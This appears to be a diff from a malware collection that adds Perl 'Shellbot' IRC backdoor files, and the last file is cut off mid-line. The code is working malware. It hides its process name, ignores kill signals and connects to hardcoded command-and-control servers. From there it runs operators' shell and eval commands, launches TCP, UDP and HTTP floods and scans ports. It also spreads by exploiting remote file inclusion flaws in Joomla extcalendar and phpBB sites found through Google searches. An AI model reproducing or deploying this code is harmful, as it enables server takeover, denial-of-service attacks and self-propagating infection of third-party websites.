$DCC{$fh}{curbyte}; + my $nick = $DCC{$fh}{nick}; + + my $msg; + my $nread = sysread($fh, $msg, 10240); + + if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) { + $DCC{$fh}{status} = "Cancelado"; + $DCC{$fh}{ftime} = time; + $dcc_sel->remove($fh); + $fh->close; + next; + } + + if ($dcctipo eq "get") { + $DCC{$fh}{curbyte} += length($msg); + + my $cur_byte = $DCC{$fh}{curbyte}; + + open(FILE, ">> $arquivo"); + print FILE "$msg" if ($cur_byte <= $bytes); + close(FILE); + + my $packbyte = pack("N", $cur_byte); + print $fh "$packbyte"; + + if ($bytes == $cur_byte) { + $dcc_sel->remove($fh); + $fh->close; + $DCC{$fh}{status} = "Recebido"; + $DCC{$fh}{ftime} = time; + next; + } + } elsif ($dcctipo eq "send") { + my $send = $fh->accept; + $send->autoflush(1); + $dcc_sel->add($send); + $dcc_sel->remove($fh); + $DCC{$send}{tipo} = 'sendcon'; + $DCC{$send}{itime} = time; + $DCC{$send}{nick} = $nick; + $DCC{$send}{bytes} = $bytes; + $DCC{$send}{curbyte} = 0; + $DCC{$send}{arquivo} = $arquivo; + $DCC{$send}{ip} = $send->peerhost; + $DCC{$send}{porta} = $send->peerport; + $DCC{$send}{status} = "Enviando"; + + #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon + open(FILE, "< $arquivo"); + my $fbytes; + read(FILE, $fbytes, 1024); + print $send "$fbytes"; + close FILE; +# delete($DCC{$fh}); + } elsif ($dcctipo eq 'sendcon') { + my $bytes_sended = unpack("N", $msg); + $DCC{$fh}{curbyte} = $bytes_sended; + if ($bytes_sended == $bytes) { + $fh->close; + $dcc_sel->remove($fh); + $DCC{$fh}{status} = "Enviado"; + $DCC{$fh}{ftime} = time; + next; + } + open(SENDFILE, "< $arquivo"); + seek(SENDFILE, $bytes_sended, 0); + my $send_bytes; + read(SENDFILE, $send_bytes, 1024); + print $fh "$send_bytes"; + close(SENDFILE); + } + } +} + + +sub SEND { + my ($nick, $arquivo) = @_; + unless (-r "$arquivo") { + return(0); + } + + my $dccark = $arquivo; + $dccark =~ s/[.*\/](\S+)/$1/; + + my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'}; + my $longip = unpack("N",inet_aton($meuip)); + + my @filestat = stat($arquivo); + my $size_total=$filestat[7]; + if ($size_total == 0) { + return(0); + } + + my ($porta, $sendsock); + do { + $porta = int rand(64511); + $porta += 1024; + $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock); + } until $sendsock; + + $DCC{$sendsock}{tipo} = 'send'; + $DCC{$sendsock}{nick} = $nick; + $DCC{$sendsock}{bytes} = $size_total; + $DCC{$sendsock}{arquivo} = $arquivo; + + + &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total"); + +} + +sub GET { + my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_; + return(0) if (-e "$arquivo"); + if (open(FILE, "> $arquivo")) { + close FILE; + } else { + return(0); + } + + my $dccip=fixaddr($dcclongip); + return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1); + my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0); + $dccsock->autoflush(1); + $dcc_sel->add($dccsock); + $DCC{$dccsock}{tipo} = 'get'; + $DCC{$dccsock}{itime} = time; + $DCC{$dccsock}{nick} = $nick; + $DCC{$dccsock}{bytes} = $bytes; + $DCC{$dccsock}{curbyte} = 0; + $DCC{$dccsock}{arquivo} = $arquivo; + $DCC{$dccsock}{ip} = $dccip; + $DCC{$dccsock}{porta} = $dccporta; + $DCC{$dccsock}{status} = "Recebendo"; +} + +# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas +sub Status { + my $socket = shift; + my $sock_tipo = $DCC{$socket}{tipo}; + unless (lc($sock_tipo) eq "chat") { + my $nick = $DCC{$socket}{nick}; + my $arquivo = $DCC{$socket}{arquivo}; + my $itime = $DCC{$socket}{itime}; + my $ftime = time; + my $status = $DCC{$socket}{status}; + $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime}); + + my $d_time = $ftime-$itime; + + my $cur_byte = $DCC{$socket}{curbyte}; + my $bytes_total = $DCC{$socket}{bytes}; + + my $rate = 0; + $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0; + my $porcen = ($cur_byte*100)/$bytes_total; + + my ($r_duv, $p_duv); + if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) { + $r_duv = $3; $r_duv++ if $4 >= 5; + $rate = "$1\.$2"."$r_duv"; + } + if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) { + $p_duv = $3; $p_duv++ if $4 >= 5; + $porcen = "$1\.$2"."$p_duv"; + } + return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen"); + } + + + return(0); +} + + +# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor) +sub fixaddr { + my ($address) = @_; + + chomp $address; # just in case, sigh. + if ($address =~ /^\d+$/) { + return inet_ntoa(pack "N", $address); + } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { + return $address; + } elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation! + return inet_ntoa(((gethostbyname($address))[4])[0]); + } else { + return; + } +} + + +DDDDDDDD + + diff --git a/Perl/Backdoor.Perl.Shellbot.o b/Perl/Backdoor.Perl.Shellbot.o new file mode 100644 index 00000000..b427a588 --- /dev/null +++ b/Perl/Backdoor.Perl.Shellbot.o @@ -0,0 +1,515 @@ +# Thanks To apaii, KingFighter, fdf, Kill_Tech And gr33t t0 Myhack & HackerMalaysia @DALnet +# ------[eoff = End Of Fucking Files]----- + + + +system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`"); + + +my $processo = 'httpsl'; + +# Bermula Disini + +my @titi = ("afrika-"); + +my $sleep='5'; +my $linas_max='4'; +my @adms=("xx","ok","mos", "Boss_xx", "KKTeam", "KaHiN"); +my @hostauth=("fbi.gov"); +my @canais=("#mambo"); +my $nick= $titi[rand scalar @titi]; +my $ircname = $titi[rand scalar @titi]; +chop (my $realname = $titi[rand scalar @titi]); + +$servidor='xx.albap0wer.com' unless $servidor; +my $porta='8555'; +my $versi_saya = '1.0'; +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Problema com o fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); + +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + + for(my $c=0; $c<= $#lines; $c++) { + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); + } + if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) { + if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } + } + } + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + } + } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { + nick("$meunick|".int rand(999999)); + } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + $meunick = $2; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; + foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); + } + } +} + + +sub bfunc { + my $printl = $_[0]; + my $funcarg = $_[1]; + if (my $pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta"); + } else { + sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); + } + } + if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2."."); + } + if ($funcarg =~ /^version/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 HackerMalaysia Versi ".$versi_saya); + } + if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for Php-Nuk3 exploit ".$1." seconds."); + srand; + my $itime = time; + my ($cur_time); + my ($exploited); + $boturl=$2; + $cur_time = time - $itime;$exploited = 0; + while($1>$cur_time){ + $cur_time = time - $itime; + @urls=fetch(); + foreach $url (@urls) { + $cur_time = time - $itime; + my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/; + $url =$path."components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=$boturl?"; + $page = http_query($url); + $exploited = $exploited + 1; + } + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." Php-Nuk3 boxes in ".$1." seconds."); + } + if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($2>$cur_time){ + $cur_time = time - $itime; + my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); + print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; + close($socket); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1."."); + } + if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds."); + my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); + $dtime = 1 if $dtime == 0; + my %bytes; + $bytes{igmp} = $2 * $pacotes{igmp}; + $bytes{icmp} = $2 * $pacotes{icmp}; + $bytes{o} = $2 * $pacotes{o}; + $bytes{udp} = $2 * $pacotes{udp}; + $bytes{tcp} = $2 * $pacotes{tcp}; + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1."."); + } + exit; + } + } +} + +sub ircase { + my ($kem, $printl, $case) = @_; + + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } + if ($case =~ /^rejoin\s+(.*)/) { + my $chan = $1; + if ($chan =~ /^(\d+) (.*)/) { + for (my $ca = 1; $ca <= $1; $ca++ ) { + p("$2"); + j("$2"); + } + } else { + p("$chan"); + j("$chan"); + } + } + if ($case =~ /^op/) { + op("$printl", "$kem") if $case eq "op"; + my $oarg = substr($case, 3); + op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^deop/) { + deop("$printl", "$kem") if $case eq "deop"; + my $oarg = substr($case, 5); + deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^msg\s+(\S+) (.*)/) { + msg("$1", "$2"); + } + if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + msg("$2", "$3"); + } + } + if ($case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp("$1", "$2"); + } + if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + ctcp("$2", "$3"); + } + } + if ($case =~ /^nick (.*)/) { + nick("$1"); + } + if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { + conectar("$2", "$1", 6667); + } + if ($case =~ /^raw (.*)/) { + sendraw("$1"); + } + if ($case =~ /^eval (.*)/) { + eval "$1"; + } +} + +sub shell { + my $printl=$_[0]; + my $comando=$_[1]; + if ($comando =~ /cd (.*)/) { + chdir("$1") || msg("$printl", "No such file or directory"); + return; + } + elsif ($pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`$comando 2>&1 3>&1`; + my $c=0; + foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } + } + exit; + } + } +} + +sub tcpflooder { + my $itime = time; + my ($cur_time); + my ($ia,$pa,$proto,$j,$l,$t); + $ia=inet_aton($_[0]); + $pa=sockaddr_in($_[1],$ia); + $ftime=$_[2]; + $proto=getprotobyname('tcp'); + $j=0;$l=0; + $cur_time = time - $itime; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + socket($t,PF_INET,SOCK_STREAM,$proto); + connect($t,$pa)||$j--; + $j++;$l++; + } + $l=0; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + shutdown($t,2); + $l++; + } +} + +sub udpflooder { + my $iaddr = inet_aton($_[0]); + my $msg = 'A' x $_[1]; + my $ftime = $_[2]; + my $cp = 0; + my (%pacotes); + $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; + + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; + return(undef) if $cp == 4; + my $itime = time; + my ($cur_time); + while ( 1 ) { + for (my $porta = 1; $porta <= 65000; $porta++) { + $cur_time = time - $itime; + last if $cur_time >= $ftime; + send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; + send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; + send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; + send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + for (my $pc = 3; $pc <= 255;$pc++) { + next if $pc == 6; + $cur_time = time - $itime; + last if $cur_time >= $ftime; + socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; + send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; + } + } + last if $cur_time >= $ftime; + } + return($cur_time, %pacotes); +} + +sub ctcp { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} +sub msg { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :$_[1]"); +} +sub notice { + return unless $#_ == 1; + sendraw("NOTICE $_[0] :$_[1]"); +} +sub op { + return unless $#_ == 1; + sendraw("MODE $_[0] +o $_[1]"); +} +sub deop { + return unless $#_ == 1; + sendraw("MODE $_[0] -o $_[1]"); +} +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw("JOIN $_[0]"); +} +sub p { part(@_); } +sub part { + sendraw("PART $_[0]"); +} +sub nick { + return unless $#_ == 0; + sendraw("NICK $_[0]"); +} +sub quit { + sendraw("QUIT :$_[0]"); +} + +# Spreader +# this 'spreader' code isnot mine, i dont know who coded it. +# update: well, i just fix0red this shit a bit. +# + +sub fetch(){ + my $rnd=(int(rand(9999))); + my $n= 80; + if ($rnd<5000) { $n<<=1;} + my $s= (int(rand(10)) * $n); + +my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec", + "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop", + "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi", + "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk", + "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir", + "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke", + "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm", + "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc", + "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz", + "vu","vn","ye","yu","cd","zm","zw",""); +my @str; + +foreach $dom (@dominios) +{ + push (@str,"%22com_extcalendar%22+inurl%3Aindex.php?option=com_extcalendar+site%3A&".$dom."%20"); +} + + my $query="www.google.co.uk/search?q="; + $query.=$str[(rand(scalar(@str)))]; + $query.="hl=en&lr=&start=$&sa=N"; + my @lst=(); + my $page = http_query($query); + while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){ + if ($1 !~ m/google|cache|translate/){ + push (@lst,$1); + } + } + return (@lst); +} + +sub http_query($){ + my ($url) = @_; + my $host=$url; + my $query=$url; + my $page=""; + $host =~ s/href=\"?http:\/\///; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $query =~s/$host//; + if ($query eq "") {$query="/";}; + eval { + local $SIG{ALRM} = sub { die "1";}; + alarm 10; + my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; + print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$sock>; + $page="@r"; + alarm 0; + close($sock); + }; + return $page; + +} + + + + diff --git a/Perl/Backdoor.Perl.Shellbot.s b/Perl/Backdoor.Perl.Shellbot.s new file mode 100644 index 00000000..ab0bac7a --- /dev/null +++ b/Perl/Backdoor.Perl.Shellbot.s @@ -0,0 +1,515 @@ +# Thanks To apaii, KingFighter, fdf, Kill_Tech And gr33t t0 Myhack & HackerMalaysia @DALnet +# ------[eoff = End Of Fucking Files]----- + + + +system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`"); + + +my $processo = 'httpsl'; + +# Bermula Disini + +my @titi = ("PhpNuke-|"); + +my $sleep='5'; +my $linas_max='4'; +my @adms=("xx","mos","fuckyou"); +my @hostauth=("fbi.gov"); +my @canais=("#phpnuke1"); +my $nick= $titi[rand scalar @titi]; +my $ircname = $titi[rand scalar @titi]; +chop (my $realname = $titi[rand scalar @titi]); + +$servidor='mushu.tetovalive.de' unless $servidor; +my $porta='8209'; +my $versi_saya = '1.0'; +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Problema com o fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); + +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + + for(my $c=0; $c<= $#lines; $c++) { + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); + } + if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) { + if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } + } + } + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + } + } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { + nick("$meunick|".int rand(999999)); + } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + $meunick = $2; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; + foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); + } + } +} + + +sub bfunc { + my $printl = $_[0]; + my $funcarg = $_[1]; + if (my $pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta"); + } else { + sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); + } + } + if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2."."); + } + if ($funcarg =~ /^version/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 HackerMalaysia Versi ".$versi_saya); + } + if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for Php-Nuk3 exploit ".$1." seconds."); + srand; + my $itime = time; + my ($cur_time); + my ($exploited); + $boturl=$2; + $cur_time = time - $itime;$exploited = 0; + while($1>$cur_time){ + $cur_time = time - $itime; + @urls=fetch(); + foreach $url (@urls) { + $cur_time = time - $itime; + my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/; + $url =$path."/modules/Forums/admin/admin_users.php?phpbb_root_path=$boturl?"; + $page = http_query($url); + $exploited = $exploited + 1; + } + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." Php-Nuk3 boxes in ".$1." seconds."); + } + if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { + sendraw($IRC_cur_socket, 